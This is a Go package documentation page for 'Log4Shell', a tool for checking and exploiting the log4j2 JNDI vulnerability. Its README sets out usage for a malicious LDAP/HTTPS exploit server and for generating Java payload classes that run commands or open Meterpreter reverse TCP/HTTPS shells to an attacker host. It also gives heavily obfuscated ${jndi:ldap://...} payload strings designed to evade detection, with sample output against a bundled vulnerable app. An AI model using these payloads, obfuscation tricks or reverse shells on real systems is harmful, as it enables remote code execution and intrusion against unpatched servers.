log4shell

package module

v1.0.4 Latest Latest Go to latest Published: Dec 23, 2021 License: GPL-3.0 Imports: 19 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/For-ACGN/Log4Shell

Links

Open Source Insights

README ¶

Log4Shell

Check, exploit, generate class, obfuscate, TLS, ACME about log4j2 vulnerability in one Go program.

Feature

Only one program and easy deployment
Support common operating systems
Support multi Java class files
Support LDAPS and HTTPS server
Support ACME to sign certificate
Generate class without Java compiler
Support obfuscate malicious(payload)
Hide malicious(payload) string
Add secret to protect HTTP server
Add token to fix repeat execute payload

Usage

Start Log4Shell server

Log4Shell.exe -host "1.1.1.1"
Log4Shell.exe -host "example.com"

Start Log4Shell server with TLS

Log4Shell.exe -host "example.com" -tls-server -tls-cert "cert.pem" -tls-key "key.pem"
Log4Shell.exe -host "1.1.1.1" -tls-server -tls-cert "cert.pem" -tls-key "key.pem" (need IP SANs)

Start Log4Shell server with ACME

Log4Shell.exe -host "example.com" -auto-cert (must use domain name)

Generate Java class file

Execute(no output):
  Log4Shell.exe -gen "execute" -args "-cmd calc" -class "Test"

System(with output):
  Log4Shell.exe -gen "system" -args "-bin cmd -args \"/c net user\"" -class "Test"

ReverseTCP(java/meterpreter/reverse_tcp):      // template will be open source after some time
  Log4Shell.exe -gen "reverse_tcp" -args "-lhost 1.1.1.1 -lport 9979" -class "Test"

ReverseHTTPS(java/meterpreter/reverse_https):  // template will be open source after some time
  Log4Shell.exe -gen "reverse_https" -args "-lhost 1.1.1.1 -lport 8443 -luri test" -class "Test"  

The generated class file will be saved to the payload directory(can set output flag)

Obfuscate malicious(payload) string

Log4Shell.exe -obf "${jndi:ldap://1.1.1.1:3890/Calc}"

raw: ${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}

${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-
da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo
@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.m
Q:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s
:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}

Each string can only be used once, or wait 20 seconds.

When obfuscate malicious(payload) string, log4j2 package will repeat execute it, the number of
repetitions is equal the number of occurrences about string "${". The LDAP server add a simple
token mechanism for prevent it.

Hide malicious(payload) string

Log4Shell.exe -obf "${jndi:ldap://127.0.0.1:3890/Calc}" -hide

raw: ${jndi:ldap://127.0.0.1:3890/Calc$YG=.z[.od7rH0XpE}

Execute VulApp:

E:\OneDrive\Projects\Golang\GitHub\Log4Shell\vulapp\jar>D:\Java\jdk1.8.0_121\bin\java -jar 
vulapp.jar ${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK:
-l}d${SaS-TmMt:-a}${uQH-oRFIXtw-4[:-}p:${XL9-bkp9k]-xz:-//}12${D@-rF@wGm:-7.0}.${Fuc:SCV6B
m:-}${W1eelS:1jnUDknTJS:*7aHahf2m:vK:-0.1}${ft:4Zbf5Hf1G:Tskg:-:3}${6WH[wc:Fencc:-8}${24Y:
5h=5SqK-p(X9:-9}${oYCk6-RDIN5a$Od:U]3iOEVv:7MiEj:-0/C}${NzvB:]6T9$_O9-F.IUl-NnZq:-a}lc$YG=
${*E-5M:-.z[}${N_9@-6(l0sy-b(6.6t-y7NC*:-}${0i-4eS4kB:-.}${5WnL-LKTO554q-x[d:-od7}rH0$${oC
:.XYPyzv6-sPH.]*Ls:$@Q:-XpE}}
${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK:-l}d${SaS-T
mMt:-a}${uQH-oRFIXtw-4[:-}p:${XL9-bkp9k]-xz:-//}12${D@-rF@wGm:-7.0}.${Fuc:SCV6Bm:-}${W1eel
S:1jnUDknTJS:*7aHahf2m:vK:-0.1}${ft:4Zbf5Hf1G:Tskg:-:3}${6WH[wc:Fencc:-8}${24Y:5h=5SqK-p(X
9:-9}${oYCk6-RDIN5a$Od:U]3iOEVv:7MiEj:-0/C}${NzvB:]6T9$_O9-F.IUl-NnZq:-a}lc$YG=${*E-5M:-.z
[}${N_9@-6(l0sy-b(6.6t-y7NC*:-}${0i-4eS4kB:-.}${5WnL-LKTO554q-x[d:-od7}rH0$${oC:.XYPyzv6-s
PH.]*Ls:$@Q:-XpE}}
15:49:14.676 [main] ERROR log4j - XpE}

E:\OneDrive\Projects\Golang\GitHub\Log4Shell\vulapp\jar>

The Logger will only record a part of raw string "15:49:14.676 [main] ERROR log4j - XpE}",
and repeat execute will not appear(I don't know why this happened).

Check

start Log4Shell server
send ${jndi:ldap://1.1.1.1:3890/Nop}
send ${jndi:ldaps://example.com:3890/Nop} with TLS

Exploit

start Log4Shell server
put your class file to the payload directory
send ${jndi:ldap://1.1.1.1:3890/Meterpreter}
send ${jndi:ldaps://example.com:3890/Meterpreter} with TLS
meterpreter will open source after some time

VulApp

VulApp is a vulnerable Java program that use log4j2 package.
You can use it for develop this project easily.
java -jar vulapp.jar ${jndi:ldap://127.0.0.1:3890/Calc}

Help

:::      ::::::::   ::::::::      :::     ::::::::  :::    ::: :::::::::: :::      :::
:+:     :+:    :+: :+:    :+:    :+:     :+:    :+: :+:    :+: :+:        :+:      :+:
+:+     +:+    +:+ +:+          +:+ +:+  +:+        +:+    +:+ +:+        +:+      +:+
+#+     +#+    +:+ :#:         +#+  +:+  +#++:++#++ +#++:++#++ +#++:++#   +#+      +#+
+#+     +#+    +#+ +#+   +#+# +#+#+#+#+#+       +#+ +#+    +#+ +#+        +#+      +#+
#+#     #+#    #+# #+#    #+#       #+#  #+#    #+# #+#    #+# #+#        #+#      #+#
######## ########   ########        ###   ########  ###    ### ########## ######## ########

                                                      https://github.com/For-ACGN/Log4Shell

Usage of Log4Shell.exe:
-args string
      arguments about generate Java class file
-auto-cert
      use ACME client to sign certificate automatically
-class string
      specify the new class name
-gen string
      generate Java class file with template name
-hide
      hide obfuscated malicious(payload) string in log4j2
-host string
      server IP address or domain name (default "127.0.0.1")
-http-addr string
      http server address (default ":8080")
-http-net string
      http server network (default "tcp")
-ldap-addr string
      ldap server address (default ":3890")
-ldap-net string
      ldap server network (default "tcp")
-no-token
      not add random token when use obfuscate
-obf string
      obfuscate malicious(payload) string
-output string
      generated Java class file output path
-payload string
      payload(java class) directory (default "payload")
-tls-cert string
      tls certificate file path (default "cert.pem")
-tls-key string
      tls private key file path (default "key.pem")
-tls-server
      enable ldaps and https server

Screenshot

Documentation ¶

Index ¶

Constants
func CommandLineToArgs(cmd string) []string
func GenerateExecute(template []byte, command, class string) ([]byte, error)
func GenerateReverseHTTPS(template []byte, host string, port uint16, uri, ua, token, class string) ([]byte, error)
func GenerateReverseTCP(template []byte, host string, port uint16, token, class string) ([]byte, error)
func GenerateSystem(template []byte, binary, arguments, class string) ([]byte, error)
func Obfuscate(raw string, token bool) (string, string)
func ObfuscateWithDollar(raw string, token bool) (string, string)
type Config
type Server
- func New(cfg *Config) (*Server, error)

Constants ¶

View Source

const TokenExpireTime = 20 // second

TokenExpireTime is used to prevent repeat execute payload.

Variables ¶

This section is empty.

Functions ¶

func CommandLineToArgs ¶ added in v1.0.4

func CommandLineToArgs(cmd string) []string

CommandLineToArgs splits a command line into individual argument strings, following the Windows conventions documented at http://daviddeley.com/autohotkey/parameters/parameters.htm#WINARGV

func GenerateExecute ¶ added in v1.0.4

func GenerateExecute(template []byte, command, class string) ([]byte, error)

GenerateExecute is used to generate class file for execute command.

func GenerateReverseHTTPS ¶ added in v1.0.4

func GenerateReverseHTTPS(template []byte, host string, port uint16, uri, ua, token, class string) ([]byte, error)

GenerateReverseHTTPS is used to generate class file for meterpreter payload/java/meterpreter/reverse_https.

func GenerateReverseTCP ¶ added in v1.0.4

func GenerateReverseTCP(template []byte, host string, port uint16, token, class string) ([]byte, error)

GenerateReverseTCP is used to generate class file for meterpreter payload/java/meterpreter/reverse_tcp.

func GenerateSystem ¶ added in v1.0.4

func GenerateSystem(template []byte, binary, arguments, class string) ([]byte, error)

GenerateSystem is used to generate class file for execute command with arguments.

func Obfuscate ¶

func Obfuscate(raw string, token bool) (string, string)

Obfuscate is used to obfuscate malicious(payload) string like ${jndi:ldap://127.0.0.1:3890/Calc} for log4j2 package. Return value are obfuscated string and raw with token.

func ObfuscateWithDollar ¶ added in v1.0.3

func ObfuscateWithDollar(raw string, token bool) (string, string)

ObfuscateWithDollar will obfuscate malicious(payload) string, and add a dollar symbol before one string like "${xxx-xxx:-section}". When add one Dollar, repeat execute will not appear and the logger will not print the whole obfuscated string, just a little, but I don't know why this happened, It may cause unexpected situations, so it is disabled by default.

Types ¶

type Config ¶

type Config struct {
	// Logger is used to set server logger writer.
	Logger io.Writer

	// Hostname can be set IP address or domain name,
	// If enable AutoCert, must set domain name.
	Hostname string

	// PayloadDir contains Java class files.
	PayloadDir string

	// about servers network and address.
	HTTPNetwork string
	HTTPAddress string
	LDAPNetwork string
	LDAPAddress string

	// AutoCert is used to ACME client to sign
	// certificate automatically, don't need to
	// set EnableTLS true again.
	AutoCert bool

	// EnableTLS is used to enable ldaps and
	// https server, must set TLS certificate.
	EnableTLS bool

	// TLSCert is used to for ldaps and https.
	TLSCert tls.Certificate
}

Config contains configurations about log4shell server.

type Server ¶

type Server struct {
	// contains filtered or unexported fields
}

Server is used to create an exploit server that contain a http server and ldap server(can wrap tls), it used to check and exploit Apache Log4j2 vulnerability easily.

func New ¶

func New(cfg *Config) (*Server, error)

New is used to create a new log4shell server.

func (*Server) HTTPAddress ¶ added in v1.0.2

func (srv *Server) HTTPAddress() string

HTTPAddress is used to get the http listener address.

func (*Server) IsEnableTLS ¶ added in v1.0.2

func (srv *Server) IsEnableTLS() bool

IsEnableTLS is used to get the log4shell server is enabled TLS.

func (*Server) LDAPAddress ¶ added in v1.0.2

func (srv *Server) LDAPAddress() string

LDAPAddress is used to get the ldap listener address.

func (*Server) Secret ¶

func (srv *Server) Secret() string

Secret is used to get the generated secret about url.

func (*Server) Start ¶

func (srv *Server) Start() error

Start is used to start log4shell server.

func (*Server) Stop ¶

func (srv *Server) Stop() error

Stop is used to stop log4shell server.

Source Files ¶

View all Source files

Directories ¶

Path	Synopsis
cmd

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL